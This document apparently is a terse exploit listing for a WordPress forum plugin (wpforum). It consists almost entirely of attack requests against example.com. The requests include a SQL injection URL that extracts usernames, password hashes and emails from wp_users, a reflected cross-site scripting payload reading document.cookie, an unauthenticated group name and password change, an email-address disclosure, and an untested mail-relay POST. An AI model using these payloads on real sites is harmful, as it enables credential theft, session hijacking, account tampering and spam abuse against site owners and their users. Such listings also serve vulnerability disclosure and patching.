http://www.example.com/wordpress/?page_id=<forum>&forumaction=group_login&group_id=0%20UNION%20SELECT%20CONCAT_WS%28CHAR%2858%29,user_login,user_pass,user_email%29%20FROM%20wp_users%20LIMIT%201%20%23 http://www.example.com/wordpress/<forum>?forumaction=group_login&group_id=<script>alert(document.cookie);<%2fscript> http://www.example.com/wordpress/wp-content/plugins/wpforum/wp-forum-manage.php?editgroupsubmit=true&group=<group id>&groupname=<new group name>&passwd=<new group password> http://www.example.com/wordpress/wp-content/plugins/wpforum/sendmail.php?user=<user id> (email address will be in HTML source) POST 'submit=true&sender=<from address>&email=<to address>&message=<body>&subject=<subject>&replyto=<replyto> to http://www.example.com/wordpress/wp-content/plugins/wpforum/sendmail.php (untested)